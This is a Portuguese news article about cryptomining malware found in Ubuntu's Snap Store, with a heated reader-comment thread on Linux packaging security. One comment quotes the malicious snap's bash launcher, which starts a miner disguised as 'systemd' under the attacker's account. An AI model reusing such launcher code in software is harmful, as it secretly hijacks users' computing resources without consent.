Linux

Cuidado: A loja de apps do Ubuntu também tem malware

69 Comentários

Todos reconhecem no Linux uma segurança elevada e até maior que nos restantes sistemas operativos. A sua comunidade tem um papel importante ao desenvolver este sistema e as suas aplicações de forma aberta.

É claro que não é um sistema isento de problemas e, por vezes, até bem graves. O mais recente problema vem diretamente para o Ubuntu e para a sua loja de apps. Não é normal, mas foram encontradas apps com malware.

Ubuntu malware Snap loja apps

A mais recente forma de distribuir aplicações no Ubuntu é através de pacotes Snap. Este formato tem características específicas, quer ao nível da segurança quer da forma como interage com o próprio Ubuntu tem-se tornado o padrão da indústria e está em várias outras distribuições, dada a forma simples como os programadores podem partilhar as suas apps, independentemente da plataforma.

Foi precisamente na loja de apps Snap da Canonical que foram encontradas 2 aplicações, aparentemente normais, mas que continham código (ByteCoin) destinado a minerar criptomoedas de forma invisível para os utilizadores. Esta “funcionalidade” estava disfarçada como o daemon “systemd”.

Para além desta máscara, as aplicações carregavam ainda scripts de inicialização que se destinavam a colocar, de forma automática, o código malicioso em execução em segundo plano, onde ficava sem ser detetado.

Ubuntu malware Snap loja apps

A Canonical revelou que removeu todas as aplicações deste autor enquanto aguarda a realização de investigações para apurar o impacto que estas tiveram. As aplicações estavam disponíveis desde o final de abril.

À semelhança de outras lojas de aplicações, todo o código que é carregado para a Snap Store é validado. A questão é que estes são automáticos e limitam-se a validar a sua funcionalidade e a capacidade de ser instalada noutras distribuições, não sendo verificado o código de forma exaustiva.

A categorização de malware neste caso deve-se à presença de código e funcionalidades maliciosas sem que as mesmas estivessem anunciadas na descrição da app. Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.

Fonte

PUB
Autor: Pedro Simões
Partilhar:
Tags:
Linux malware SNAP Ubuntu

PUB.

Questão Semanal

Deveria haver uma marca obrigatória em todas as imagens geradas por IA?

Ver Resultados

Loading ... Loading …
Arquivo de Questões

PUB.

Velocímetro Pplware

Teste a velocidade da sua Internet
Facebook volta a ter problemas com partilha de dados dos utilizadores
Artigo anterior

Facebook volta a ter problemas com partilha de dados dos utilizadores
Dica: Saiba como ativar e configurar o novo modo offline do Gmail
Próximo artigo

Dica: Saiba como ativar e configurar o novo modo offline do Gmail
PUB

Comentários

69

Deixe um comentário

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

  1. Avatar de Carlos Costa
    Carlos Costa

    Zero fontes?

    Responder
  2. Avatar de P
    P

    Dizer que isto é malware, que é, mas dando a ideia que está ao nível de um trojan…
    Podiam ter reforçado a segurança dos pactotes snaps

    Responder
  3. Avatar de ze
    ze

    ah e tal, é seguro!

    Responder
  4. Avatar de CMatomic
    CMatomic

    Ate parece que só existe o ubuntu no mundo GNU/Linux , mas descobriu-se o problema .
    “Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.”
    A loja de aplicações do ubuntu é responsabilidade da canonical , e não do kernel Linux ou do sistema GNU .
    Alias não é a primeira-vez tal acontece .

    Responder
    1. Avatar de CMatomic
      CMatomic

      *100%
      Quero dizer , o mais seguro possível .

      Responder
    2. Avatar de VaGNaroK
      VaGNaroK

      Finalmente alguém com conhecimento e palavras louváveis a serem digitadas, ao que parece ter mais conhecimento que o próprio autor do artigo.

      Responder
    3. Avatar de Mário Santos
      Mário Santos

      Concordo, e além disso, notícias destas no mundo linux são uma raridade, quando comparado com o que acontece em Windows. Obviamente que não existem sistemas imunes, mas eu não troco (ainda mais nos dias de hoje), os meus sistemas linux por outro qualquer.

      Responder
  5. Avatar de arc
    arc

    Vejamos…

    1. “Todos reconhecem no Linux uma segurança elevada e até maior que nos restantes sistemas operativos. A sua comunidade tem um papel importante ao desenvolver este sistema e as suas aplicações de forma aberta.”

    Linux, NÃO é um sistema operativo!
    Sistemas Operativos em que incorporam o Kernel, são as distribuições de Linux, as quais seguem os seus formatos padronizados de empacotamento!!

    Uma vantagem desde já para os SO Open Source e para qualquer aplicação, em que este pode ser escrutinado de forma Livre, Directa, Imediata e Corrigido o mais Rapidamente possível.

    2. ” … tem-se tornado o padrão da indústria e está em várias outras distribuições, dada a forma simples como os programadores podem partilhar as suas apps, independentemente da plataforma.”

    O formato de empacotamento Snap, NÃO é padrão em NENHUMA distribuição de Linux. Uma coisa é poder ser usado…outra diferente é ser um PADRÃO.

    No caso especifico da distribuição Ubuntu Linux, o formato de empacotamento PADRÃO e como é um derivado do Debian Linux é o formato .deb e NÃO…Snap.

    3. “A questão é que estes são automáticos e limitam-se a validar a sua funcionalidade e a capacidade de ser instalada noutras distribuições, não sendo verificado o código de forma exaustiva.”

    Aí está a verdade a começar a ver a Luz!

    Contrariamente, ao que acontece, se fosse um pacote padronizado para as distribuições de Linux, OBRIGATORIAMENTE, tinha de passar pela auditoria de integridade desse mesmo pacote, neste caso no formato .deb, para ser colocado nos repositórios oficiais da distribuição em causa.

    O que se passa no caso da Canonical, é que deseja dar tamanhas facilidades aos utilizadores da sua distribuição Ubuntu Linux, que no caso especifico desta nova forma de empacotamento, NÃO está a olhar a meios, desvirtuando a integridade da sua distribuição.

    Mais uma razão para quem defende em que as distribuições de Linux, devem seguir os seus formatos de empacotamento PADRÃO, em detrimento de formatos de empacotamento “aligeirados”, aos quais NÃO existe controlo à data.

    Nenhuma distribuição de Linux, recomenda a instalação de pacotes Snap em detrimento da sua forma de empacotamento previamente estabelecida para o seu SO, esta é a VERDADE.

    E o mesmo pode vir a acontecer com o formato Flatpak…

    4. “A categorização de malware neste caso deve-se à presença de código e funcionalidades maliciosas sem que as mesmas estivessem anunciadas na descrição da app.”

    Em qual SO, as aplicações com malware, as quais são desconhecidas pelos utilizadores, se encontram descritas como tal, antes de serem instaladas?

    5. “Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.”

    Oura vez Linux?!?!

    A Canonical, que aprenda, NÃO queira “IMPOR”, um formato de empacotamento NOVO, para o qual ainda não tem equipa para controlar devidamente o lançamento para a comunidade de utilizadores Ubuntu, esses tipos de pacotes.

    Querem atingir o Nirvana, ainda vão parar no Limbo!!

    No entanto, não deixa de ser curioso, se a noticia for lida com a máxima atenção, que este Badware como é designada esta nova forma de malware, em que o seu autor denota uma “ligeira” falta de esforço, para disfarçar estas aplicações nocivas, na medida em que faz a inclusão de um endereço de e-mail codificado em que menciona um Ferrari (myfirstferrari@protonmail.com).

    Ver em…https://github.com/canonical-websites/snapcraft.io/issues/651#issuecomment-388546799

    #!/bin/bash

    currency=bcn
    name=2048buntu

    { # try
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 1 -g
    } || { # catch
    cores=($(grep -c ^processor /proc/cpuinfo))

    if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 1
    else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 2
    fi
    }

    NOTA: vai ficar a dúvida, se pode ter sido a forma mais expedita para chamar a ATENÇÃO da Canonical, para um buraco no seu modelo de verificação do Snapcraft.

    Não deixa de ser curioso também, que as boas praticas de instalação de pacotes em distribuições de Linux, NÃO recomendem que as aplicações a serem integradas, devemos utilizar da máxima cautela, sobre o tipo de software a ser instalado e sobre quais os locais de onde se instala.

    Exemplo: PPAs, scripts de instalação compartilhado via GitHub, etc., etc.

    CURIOSO: também não deixa de ser verdade que este bundleware, utiliza a licença do MIT, que permite que o mesmo seja distribuído como software proprietário, sem que para isso seja obrigado a ser disponibilizado o código fonte, desde que os direitos de autor sejam mantidos, como acontece neste caso.

    Nunca usei Snap nem esses “pendericalhos” e NUNCA irei utilizar nas minhas distribuiçoes de Linux, pelo simples facto que NÂO existe uma verificaçao linha a linha de codigo suspeito, como acontece nos formatos de empacotamento padrao para as distribuiçoes de Linux.

    Assim e para terminar, uma das GRANDES vantagens de se utilizar uma distribuição de Linux, software Open Source e Free Software, é precisamente a forma que temos de poder auditar TUDO e no menor espaço de tempo, disponibilizar, alertar, para que a solução para o problema seja resolvido o mais rápido possível.

    Responder
    1. Avatar de SoulReaver
      SoulReaver

      Precisamente…e parabéns pelo post.1 abraço!!!!!!!!!

      Responder
      1. Avatar de arc
        arc

        @SoulReaver…grato….1 abraço

        Responder
    2. Avatar de Pérolas
      Pérolas

      @arc: excelente post.

      Responder
      1. Avatar de arc
        arc

        @Pérolas….Obrigado

        Responder
    3. Avatar de pia
      pia

      Se acha o sabichão, kkkkkkkkk
      Snap!!! (risos)

      Responder
  6. Avatar de Sandro
    Sandro

    Nada a fazer, a não ser reinventem a Internet, e legislem, sobre a mesma, com penalizações bem severas, e até fecho de sites, que infrinjam. Não é como o Facebook, que sai impune, e continua, fazendo o que quer. Parece-me que há aqui mãozinha dos Governos, protegendo, estas poucas vergonhas.

    Responder
    1. Avatar de pois.....
      pois…..

      cá para mim são aliens…

      Responder
    2. Avatar de pia
      pia

      Quem usa facebook em pleno 2018? Pff!

      Responder
  7. Avatar de cmariano
    cmariano

    Onde é que anda o techmanja do Danilo agora?!

    Responder
    1. Avatar de Danilo
      Danilo

      Uso BSD não Linux! Fiquem aí com seus snaps cheio de vírus!

      Responder
  8. Avatar de Joao Ptt
    Joao Ptt

    Posso concluir por tanto que o ubuntu não é seguro… mas não faz mal, não o uso, por isso devo estar seguro.

    Responder
    1. Avatar de Pérolas
      Pérolas

      Qual é o seguríssimo sistemas que usas? Appl€ (LOL), Window$ (LOL)? Não nenhum sistema que seja 100% infalível, agora o que há é sistemas com menos incidências e mais seguros que outros! Uma das coisas piores do código-fechado (appl€ e window$) é o FACTO de conterem bugs que são explorados anos a fio e outros que tu nem sabes que existem e são explorados à ganância e tudo isto porque o código-fonte não pode ser validado! Um «risco na pintura» não é o mesmo que um «queijo suiço» chamado código-fechado.

      Responder
      1. Avatar de CMatomic
        CMatomic

        Não entendes ironia ?

        Responder
    2. Avatar de Samuel
      Samuel

      Tens a certeza que estas seguro? Caso não saibas o linux continua a ser mais seguro que os outros sistemas operativos. Na apps stores aparecem todo tipo de apps mas como eu só uso Synaptic Pakage Manager (a primeira app store do mundo).

      Responder
      1. Avatar de CMatomic
        CMatomic

        Synaptic não é nenhuma app store , é um gestor de software .

        Responder
  9. Avatar de sakura
    sakura

    Pacotes Snap são executados em sandBox…. sim pode por uma maquina a minerar.. mas como uso fedora com Selinux sem a minha ordem e autorização especifica, duvido que “”contamine “” um bom gnu/linux.

    Responder
  10. Avatar de jedi
    jedi

    Informem-se primeiro o que é e como funciona uma snap app. E já agora agora explicassem no artigo tambem qual a diferença entre um malware e minerar criptomoedas. 😉

    Responder
  11. Avatar de informado
    informado

    Linux Fedora 🙂 ahaha 🙂 Não há trojan, malware, virus .. nada!

    Responder
  12. Avatar de pia
    pia

    Ué, mas não era o Linux o sistema perfeito?? Que não tinha vírus e humilhava o Windows e Mac? Ora pois, tou a rir.

    Responder
    1. Avatar de eu
      eu

      leia entao o que esta escrito acima pelo arc antes de rir …

      Responder
      1. Avatar de pia
        pia

        Continuo a rir, kkkkkkk.
        Pois isso vai muito além dos snaps! Pelo visto o pplware não quis falar do “resto” pra não sujar mais a imagem do adorado “Ubuntu”.
        Os Ubuntudos fazem a festa.

        Responder
        1. Avatar de Nuno
          Nuno

          Que “resto”?

          Responder
        2. Avatar de eu
          eu

          Ubuntu nao e a unica distro, existem outras … alem disso dizer que “ha mais” e nao dizer o que … e no minimo so por si razao para rir …
          Elabore entao !

          Responder
        3. Avatar de eu
          eu

          Also disso isto nao e malware, nem virus nem nada que se parece, trata-se de aproveitar que nao existe grande controlo nos SNAPS sobre o que o pacote faz e neste caso foi adicionado um “bonus” … continuo a achar que nao sabe do que esta a falar, para se estar assim a “rir”

          Responder
        4. Avatar de Danilo
          Danilo

          Vc tá falando das novas falhas Spectre que não corrigiram no Linux?

          Responder
      2. Avatar de Marco
        Marco

        Mas ainda dão resposta ao pia?
        De certeza que encontram algo melhor que faz.

        Responder
        1. Avatar de Marco
          Marco

          Fazer e não faz

          Responder
  13. Avatar de sakura
    sakura

    “”Ué, mas não era o Linux o sistema perfeito??””

    se usa uma distro vendida a “MS,Canonical$$$” ou made in ch o problema é teu.
    quem usa linux Gosta mesmo é de PURO OSS. ArchLinux ou uma distro com suporte valido REL,Fedora, e sim o selinux tem backdoors, mas a segurança tem um preço, não há almoços grátis.
    Se é seguro ……. Lol os outros são melhores.

    Responder
    1. Avatar de Danilo
      Danilo

      BSD é muito melhor, aceitem logo

      Responder
  14. Avatar de ademirt
    ademirt

    No Archlinux se utilizar o AUR package também há riscos como o SNAP.

    Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

    “Pacote sem suporte, potencialmente perigoso.”

    Responder
    1. Avatar de arc
      arc

      @adermit, importa-se de nos elucidar a todos, com um exemplo prático, da sua máquina onde executa o Arch Linux?

      Portanto, para si, SEMPRE que se instala um pacote via AUR:

      “Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      “Pacote sem suporte, potencialmente perigoso.” ”

      Sabe, eu gosto de ver para acreditar, mas só com exemplos reais.

      Responder
      1. Avatar de ademirt
        ademirt

        Conforme documentação sobre pacote do Repositório de Usuário do Arch , também conhecido como AUR:

        https://wiki.archlinux.org/index.php/Arch_User_Repository_(Português)

        São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.

        Responder
        1. Avatar de Danilo
          Danilo

          O problema desse arc é que é defensor ferrenho do Arch Linux, até o nome dele “arc”, deve ser do “Arch”. Ridículo.

          Responder
          1. Avatar de arc
            arc

            @Danilo, EU..NÃO utilizo só Arch Linux, utilizo também Linux Mint, CentOS e Debian Linux, por necessidades que NÃO tenho de lhe dar explicações.

            POR ISSO…NÃO …ESCREVA sobre o que NÃO SABE, a respeito do que EU DEFENDO ou NÃO.

            E se for ler mais os meus comentários, também aponto as CRITICAS, quando existe FUNDAMENTO e COM PROVAS devidamente fundamentadas da minha autoria e assentes em documentação CREDÍVEL existente e sempre que seja possível com exemplos das minhas máquinas!!!!

            Mas voltando a SI, NÃO deixa de ser CARICATO, exercer o seu poder de critica, e NÃO OLHAR PARA para O QUE ANDA A DIZER pelo Pplware, sobre:

            “O problema desse arc é que é defensor ferrenho do Arch Linux, até o nome dele “arc”, deve ser do “Arch”. Ridículo.”

            REPARE PARA OS SEUS COMENTÁRIOS:

            Use BSD então! Mas nem todos tem capacidade de usá-lo, é para bem poucos,
            enquanto isso fique no seu Windows achando que está seguro.

            (https://pplware.sitedev.pt/informacao/windows-ou-macos-para-que-instale-o-linux-manjaro-8/#comments)

            Uso BSD não Linux! Fiquem aí com seus snaps cheio de vírus!

            (https://pplware.sitedev.pt/linux/loja-apps-ubuntu-malware/#comments)

            BSD é muito melhor, aceitem logo

            (https://pplware.sitedev.pt/linux/loja-apps-ubuntu-malware/#comments)

            Afinal, o RIDÍCULO….é… VOCê!!!!

          2. Avatar de arc
            arc

            @Danilo, sobre isto: “até o nome dele “arc”, deve ser do “Arch”. Ridículo.”

            É tão VERDADE….arc se encontrar ligado a Arch Linux, como você utilizar BSD nas suas máquinas!!!

          3. Avatar de Danilo
            Danilo

            Ué, mas você tá sempre a defender o Arch Linux. Sempre que alguém fala alguma coisa sobre o Arch o primeiro a comentar é você. Já meu nome, nada tem a ver com utilizar o BSD.

          4. Avatar de pia
            pia

            Deixa esse arco da velha pra lá

          5. Avatar de Danilo
            Danilo

            Quem bom saber que você pensa o mesmo. BSD é muito melhor! Ridículo é usar uma distro como Arch. Se quiser respeito no Linux, use Slackware ou Gentoo. Arch Linux virou até meme internacional e é ridicularizado em qualquer lugar.

          6. Avatar de arc
            arc

            @Danilo…

            “mas você tá sempre a defender o Arch Linux. Sempre que alguém fala alguma coisa sobre o Arch o primeiro a comentar é você.”

            Tem a certeza que sou SEMPRE o primeiro a defender o Arch nos comentários?

            https://pplware.sitedev.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-7/#comments

            https://pplware.sitedev.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-6/

            https://pplware.sitedev.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-4/

            https://pplware.sitedev.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-3/#comments

            NOTA: este acima, até foi um mode para o Manjaro Linux, passar a Arch Linux puro!

            https://pplware.sitedev.pt/linux/linux-manjaro-2/#comments

            NOTA: este acima é uma correcção ao link para download

            “Já meu nome, nada tem a ver com utilizar o BSD.”

            Mas você, alguma vez utilizou um BSD, em alguma máquina de produção, faz ideia do que fala, tem conhecimentos mínimos de sua autoria que sejam credíveis de tal feito.

            Você e outros aqui, só estão cá para os Clickbaits…e pouco mais.

            Quais os seus comentários CREDÍVEIS, que tem brindado o Pplware, vindos da sua lavra?

            Onde está a sua experiência de BSD user, vertida em factos, para que todos os interessados possam APRENDER, com os seus ensinamentos?

            Voce …é um simpatico APRENDIZ….

            https://pplware.sitedev.pt/linux/chegou-o-trueos-18-03-nunca-foi-tao-facil-usar-o-freebsd/

            Já teve o tempo de antena comigo, agora…é para dev/null.

            OK… e fim de linha!!!!

          7. Avatar de Danilo
            Danilo

            Manjaro Linux é baseado no Arch mas não é Arch. É apenas um Arch pra newbies. Tipo o que o Ubuntu é/era do Debian.

            Quanto a falar do Arch, sempre vejo você comentando sobre ele, mas eu, diferente de você não vou ir no site fica caçando por notícias que você comentou no passado. Tenho bem mais o que fazer.

            E eu uso BSD e estou feliz com ele. Não tenho nada a dizer, nem a ensinar, quem quer aprender que leia a documentação por si só! Não vou fazer o papel de professor, se você está esperando comentários assim, vai ficar esperando sentado.

            Sou só um comentarista desse site, assim como de outros, não procuro fazer parte de uma hierarquia, nem de panelinha. Estou pouco me lixando para isso.

            E você é RIDÍCULO.

        2. Avatar de arc
          arc

          @adermit, NÃO RESPONDEU, COM VERDADE AO SEU COMENTÁRIO:

          “Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

          Pacote sem suporte, potencialmente perigoso.”

          EU gostava de ver, um exemplo PRATICO, REAL, OBJECTIVO, de tal afirmação, acontecer na sua máquina com Arch Linux, ou com um qualquer derivado de Arch Linux.

          Estou precisamente a falar dessa mensagem, e o OUTPUT de uma instalação de uma qualquer aplicação instalada via repositório AUR,…NUNCA será esse o OUTPUT:

          Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

          Pacote sem suporte, potencialmente perigoso.

          PERCEBEU, OU DESEJA QUE EU LHE FAÇA UM …DESENHO?!?!

          Meu caro, NÃO INSISTA:

          “São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.”

          POIS, mas isso é totalmente diferente do OUTPUT, como você deu a entender.

          Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!

          MAS EU VOU DAR, o EXEMPLO, para PROVAR QUE VOCÊ….MENTIU!!!:

          [arc@zeus-orbital ~]$ yaourt -S pacui
          [sudo] password for arc:
          a resolver dependências…
          a procurar pacotes em conflito…

          Pacotes (2) fzf-0.17.3-2 pacui-1.10.2-1

          Tamanho Total Instalado: 3,10 MiB

          :: Continuar a instalação? [S/n]
          (2/2) a verificar chaves no chaveiro [######################] 100%
          (2/2) a verificar integridade dos pacotes [######################] 100%
          (2/2) a carregar ficheiros dos pacotes [######################] 100%
          (2/2) a verificar conflitos em ficheiros [######################] 100%
          (2/2) a verificar espaço disponível no disco [######################] 100%
          :: A processar modificações do pacote…
          (1/2) a instalar fzf [######################] 100%
          Dependências opcionais para fzf
          fish: fish keybindings
          tmux: fzf-tmux script for launching fzf in a tmux pane
          vim: plugin
          zsh: zsh keybindings [instalado]
          (2/2) a instalar pacui [######################] 100%
          Dependências opcionais para pacui
          pacaur: Needed for AUR support. [instalado]
          yaourt: Needed for AUR support. [instalado]
          yay: Needed for AUR support.
          pikaur: Needed for AUR support.
          trizen: Needed for AUR support.
          pacman-mirrors: Needed for Arch Linux mirror support [instalado]
          reflector: Needed for Arch Linux mirror support
          downgrade: Needed for hidden “downgrade” option.
          :: A correr os hooks de pós-instalação…
          (1/1) Arming ConditionNeedsUpdate…
          [arc@zeus-orbital ~]$

          Este é o OUTPUT…TOTAL da instalação de um pacote em Arch Linux, via repositório AUR, com o yaourt.

          Está PROVADO, que o que AFIRMOU (Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

          Pacote sem suporte, potencialmente perigoso.”

          ONDE ESTÁ ESSE TAL…ALERTA NO MOMENTO DE INSTALAÇÃO OU NO FINALIZAÇÃO DESSA INSTALAÇÃO?!?!?

          Responder
          1. Avatar de Wilber
            Wilber

            Isso não acontece ao se instalar o Google Chrome via AUR. Sempre pede pra editar o PKGBUILD e não sei mais o que… Bem chatinho, inclusive eu utilizo o Pamac, é bem mais bonito que fica digitando comandos numa tela preta.

          2. Avatar de ademirt
            ademirt

            Faça aí no seu Arch –> yaourt -S google-chrome

            https://youtu.be/efzh-emcn3I?t=423

          3. Avatar de Wilber
            Wilber

            Prefiro utilizar a GUI (Pamac) que usar o terminal, é mais prático e rápido que ter que dá um monte de comandos e “sim”, “não”, “sim”, “não” só pra confirmar uma mera instalação. Parece o ruindows com next, next, install, rsrsrsrs.

          4. Avatar de Wilber
            Wilber

            Muito complicado, por exemplo, instalar Vivaldi via yaourt.

            Pede pra editar o PKGBUILD
            vivaldi 1.15.1147.42-1 (2018-05-14 14:21)
            ( Pacote sem suporte: Potencialmente perigoso ! )
            ==> Editar PKGBUILD ? [S/n] (“A” para abortar)

            Depois pede pra compilar o pacote
            ==> Continuar a compilação de vivaldi ? [S/n]

            Depois ainda pede mais coisa, custa digitar um só comando e instalar de uma vez? Quem é novato vai ficar perdidinho usando o yaourt. Melhor usar o Pamac, pois até mesmo o Octopi é chato na hora de confirmar a instalação do pacote, faz o mesmo processo via terminal.

  15. Avatar de ademirt
    ademirt

    Já instalei alguns programas do repositorio AUR, como android studio, spotify, sublime text, e sempre no Output aparecia um alerta em vermelho.

    https://cdn5.linuxsecrets.com/media/xt-adaptive-images/480/images/2014/0603/snagit/sublime_text_3_AUR.png

    https://wiki.manjaro.org/index.php?title=File:Yaourtdownload.png

    https://semanickzaine.files.wordpress.com/2017/10/arch-labs-linux-minimo_2017-10-02-26_1355x682.png?w=730

    Responder
    1. Avatar de arc
      arc

      @ademirt, isso é um falso positivo mesmo. Sem impacto no SO.
      Não existem reports de problemas ao nivel de impacto no sistema.

      Responder
    2. Avatar de arc
      arc

      @adermit, mesmo por desconfiança, nao deixa de ser interessante a informação do output.
      Fica a advertência, para quem não confiar…não instalar.
      Como disse e escrevi, NÃO tive até ao momento, qualquer problema.
      No entanto, NÃO quer dizer que não possa existir, contudo dá sempre a possibilidade de abortar e além do mais, permite verificar em tempo real, possíveis problemas, algo que outros instaladores de pacotes em vários SOs, não dão oportunidade.

      Responder
      1. Avatar de ademirt
        ademirt

        Estranho @arc,

        Você postou um exemplo de um output para provar que eu menti e ainda
        escreveu:


        Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!

        Você fez no seu arch: yaourt – S google-chrome ???????????

        Apareceu o alerta ? em vermelho piscando ??? talvez você não percebeu.
        Acho que esse alerta deveria estar com letras maiores. Vou sugerir para a comunidade o Arch.

        Faz o yaourt em outros pacotes, tem muitos, por exemplo: spotify, linux-zen, sublime-text.

        Falso positivo ?!?!? Como você é ingênuo.

        Vou citar um trecho da documentação sobre o AUR :
        https://wiki.archlinux.org/index.php/Arch_User_Repository_(Português)

        ” … são totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco. ”

        Atente-se a este detalhe: não foram examinados completamente.

        Sabe por que pode haver riscos quando for instalar um pacote do repositório AUR ?

        Eu posso disponibilizar um driver, um editor, um jogo, ou qualquer outro tipo de programa no repositório AUR, e junto com este pacote um malware, por exemplo um minerador.

        Muita atenção aqui:
        Não são examinados completamente, conforme escrito na documentação do AUR, certo ?

        E aí, quando uma pessoa por exemplo você, for tentar fazer:
        yaourt -S EDITOR_DO_ADEMIRT__PODE_CONFIAR

        Vai instalar o editor e executar o meu script malicioso.

        Responder
  16. Avatar de arc
    arc

    @Wilber, PKGBUILDs apesar de serem “simples scripts” de shell, são bem mais complexos do que pode parecer e fazem a interacção com o makepkg.

    Veja sempre o AUR, como sendo um repositório de PPAs., sempre será o seu ultimo recurso!!!

    Responder
    1. Avatar de Wilber
      Wilber

      Arc vc é muito inteligente , poderia me dizer se é seguro baixar o pacote dropbox da AUR?
      Só tem ele na AUR
      https://aur.archlinux.org/packages/dropbox

      Responder
    2. Avatar de ademirt
      ademirt

      @Wilber, também estou curioso.

      @arc, até o momento você se baseou no:

      [arc@zeus-orbital ~]$ yaourt -S pacui

      Quando você provou colocando um output e afirmando que não tem riscos.

      Lembre-se, que você afirmou que:

      ” …. Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!! … ”

      E a package que está no AUR, –> teamviewer

      Responder
  17. Avatar de ,
    ,

    @Wibert e ademirt…

    Realmente, está a aparecer a mensagem no yaourt “Pacote incompatível: Potencialmente perigoso!”
    em alguns pacotes e corresponde à VERDADE.
    Todavia isso em nada afecta a integridade do sistema.

    Por exemplo, se forem instalar essas aplicaçoes via pacman, NÃO existe essa Informação.
    Se forem instalar essas mesmas aplicaçoes via pacli ou pacui, NÃO existe essa informãção.

    Se forem verificar o forum do Arch Linux, queiram por favor pesquisar por PROBLEMAS de falta de SEGURANÇA

    Responder
    1. Avatar de ademirt
      ademirt

      Não afeta a integridade, mas nada impede que eu coloque um pacote no AUR contendo um script malicioso .

      Entende ?

      Responder
  18. Avatar de arc
    arc

    …continuando…

    Se forem verificar o forum do Arch Linux, queiram por favor pesquisar por PROBLEMAS de falta de SEGURANÇA, NÃO existem relatos sobre IMPLICAÇÕES DE SEGURANÇA no SO.

    Não acham estranho, o yaourt reportar em alguns pacotes essa mesma mensagem, e nas restantes aplicações que permitem a instalação de pacotes do AUR, como seja o caso do Pacli e do Pacui, que são wrappers interactivos para o pacman e para o yaourt?

    Responder
    1. Avatar de Mika
      Mika

      AUR é mais perigosa que PPA

      Responder
    2. Avatar de ademirt
      ademirt

      Eu disse desde o início, assim como o SNAP, no Yaourt também tem riscos, eu NÃO afirmei que o Arch foi afetado por problemas de segurança.

      Entende?

      Responder
  19. Avatar de arc
    arc

    @Wilbert e ademirt….ora queiram ver onde são apresentados os problemas de aplicações relacionadas com SEGURANÇA….https://security.archlinux.org/

    E agora?

    Responder
    1. Avatar de ademirt
      ademirt

      Não tem nada informando sobre o Dropbox, Sublime Text, Andoid Studio, Teamview, etcher, vivaldi.. e outros pacotes..

      Vou ser mais simples para você entender:

      O AUR não é o problema.

      O problema é: qualquer pessoa pode disponibilizar no repositório aur algum pacote contendo malware, pois estes pacotes não são examinados oficialmente.

      Eu também uso archlinux e ubuntu, mas parece que os Linux-lovers usam Antolhos.

      Responder
  20. Avatar de arc
    arc

    @ademirt

    Primeiro, EU não uso Manjaro, e SIM… Arch Linux.
    Mas para este caso, NÃO interessada.
    Estamos a conversar sobre o AUR e este é transversal ao Arch e a todos os derivados do Arch.

    “Não tem nada informando sobre o Dropbox, Sublime Text, Andoid Studio, Teamview,
    etcher, vivaldi.. e outros pacotes..”

    TEM pois!
    Índice de Popularidade, Votação, etc., e MUITO importante…os COMENTÁRIOS sobre a aplicação.

    “O AUR não é o problema.”

    Claro que o AUR, é o PROBLEMA. Sendo o local onde são alocadas as aplicações da comunidade que realizam o envio das suas aplicações…É o PROBLEMA!!

    “O problema é: qualquer pessoa pode disponibilizar no repositório aur algum pacote
    contendo malware, pois estes pacotes não são examinados oficialmente.”

    A possibilidade pode existir sempre, mas será mesmo que essa aplicação ou conjunto de aplicações vai ser disponibilizada, para utilização comunitária?
    Mesmo no AUR, os Trusted Users, realizam auditoria às aplicações, e isso está descrito
    nas guidelines do AUR.

    Ler…https://wiki.archlinux.org/index.php/AUR_Trusted_User_Guidelines

    No entanto, NADA é INFALÍVEL como sabemos, e uma das vantagens é que em ultima instância quem manda é o USER!

    Mas também NÃO vejo o problema, em caso de “MEDO”, nada como ir às sources
    (desde que disponível)…download, descompactar, ler o readme, procedimentos
    para compilaçao e instalar.

    É assim que EU faço, quando DESCONFIO de algo.

    NÃO existem sources, NAO À INSTALAÇAO!!!

    Além do mais, NÃO é estranho uma aplicação como o yaourt, estar descontinuado desde 2017-07-19 20:22!?!?!

    https://aur.archlinux.org/packages/yaourt/

    Além do mais, NÃO é estranho uma aplicação como o packer, estar descontinuado desde 2015-08-08 14:16!?!?!

    https://aur.archlinux.org/packages/packer/

    Mas se existe perigo, o qual é POSSÍVEL, então porque razão o pacman, aplicação que
    também “comunica” com o AUR, não informa desse facto, na opção DETALHES, quando se está a instalar via AUR?

    E também NÃO deixa de ser VERDADE, que o AUR, NÃO se encontra disponível por defeito. Por alguma coisa dever ser, NÃO?

    Certamente, é o user que o coloca disponivel, VERDADE?

    Se o coloca disponível, porque NÃO vai ler a documentação e as seus POTENCIAIS PERIGOS, para o SO?

    Como da mesma forma, em Debian e derivados, NÃ existem PPAs, quem os coloca é o…!!!

    Claro que Arch Linux, NÃO é para TODOS e a “FARTURA” das facilidades de algumas distribuições em querem agradar a tudo e a todos, por vezes trás MUITOS PROBLEMAS e depois culpam as DISTRIBUIÇÕES, os formatos de empacotamento, etc.

    Então ainda trás mais PROBLEMAS, aos utilizadores do CLICK -> NEXT CLICK -> NEXT!!

